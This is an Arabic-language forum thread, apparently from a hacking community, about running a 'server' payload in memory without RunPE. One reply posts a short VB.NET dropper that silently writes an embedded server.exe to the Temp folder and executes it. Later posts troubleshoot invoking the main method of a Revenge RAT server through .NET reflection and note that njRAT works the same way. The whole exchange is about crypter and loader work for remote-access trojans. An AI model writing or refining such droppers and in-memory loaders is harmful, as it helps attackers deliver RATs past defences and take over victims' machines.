Invoke in Memory Without EntryPoint Or RunPE

تم تحميل الصفحة في 0,1821329 ثانية
Invoke in Memory Without EntryPoint Or RunPE

الغراب

Beginner Developer
rank
إنضم
1 أغسطس 2016
المشاركات
77
الإعجابات
27
النقاط
18
تشغيل قيم البيس مباشره ؟

ياغالي لازم تحول القيم الى بايت اراي.. ما ينفع تشغل نص
بارك الله فيك يا غالي
هل هناك طريقة لي تحويل
server native to .net
يعني و إستعمال نقطة إدخال عادية
.net
 

Shotgun

Beginner Developer
rank
إنضم
11 أغسطس 2016
المشاركات
82
الإعجابات
37
النقاط
18
العمر
31
العكس :123:

فيه طريقه ضع اسيرفر في Resources

او runpe
كود:
     On Error Resume Next
        clean = 1000
        Dim A As String = My.Computer.FileSystem.SpecialDirectories.Temp
        Dim B As String = A+ "server.exe"
        IO.File.WriteAllBytes(B, My.Resources.Server)
        Process.Start(B)
        End
 
إنضم
7 يوليو 2016
المشاركات
248
الإعجابات
358
النقاط
63
الإقامة
JEDDAH City
@Hallaj.Hack

كيفك يا غالي, عساك بخير ؟


بغيت اطبق الطريق على سيرفر رفنجرات سي شارب..

ولكن بيطلع لي مشكله للاسف.. ما يشتغل

ومع النجرات شغال تمام

انظر الصوره



الكود بالخلف تبغ الرفنج رات.. واضح لك اسم الكلاس واسم المين ميثود

جربت اضع Main, main, Main()

كله نفس المشكله ما يشتغل

؟
 
إنضم
7 يوليو 2016
المشاركات
248
الإعجابات
358
النقاط
63
الإقامة
JEDDAH City
أنت حليت المشكلة ولكن من غير قصد :311:

وماعتقد main() صحيحة أو ماعمري جربت وضع (). استخدم Main فقط
مرحبا يا غالي شكرا لردك.

بالاساس انا ما ببالي اشغل الرفنج رات.. فقط اخذتها ك مثال.

المشروع اللي بشغله فيه نيم سبيس..

وبرضو ما ضبط!!!

وجربت Main و كل الاحتمالات برضه نفس الشيء
 
إنضم
14 نوفمبر 2017
المشاركات
698
الإعجابات
789
النقاط
113
مرحبا يا غالي شكرا لردك.

بالاساس انا ما ببالي اشغل الرفنج رات.. فقط اخذتها ك مثال.

المشروع اللي بشغله فيه نيم سبيس..

وبرضو ما ضبط!!!

وجربت Main و كل الاحتمالات برضه نفس الشيء
اهلا فيك عزيزي

جرب BindingFlags.Static | BindingFlags.Public لل
Getmethod
اذا ماضبط حاول ترسلي المشروع
 
إنضم
7 يوليو 2016
المشاركات
248
الإعجابات
358
النقاط
63
الإقامة
JEDDAH City
اهلا فيك عزيزي

جرب BindingFlags.Static | BindingFlags.Public لل
Getmethod
اذا ماضبط حاول ترسلي المشروع
حليت المشكله،

كانت المشكله ب public static class Moha

انحلت بحذف static فقط


شكرا لك اخوي نيان
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل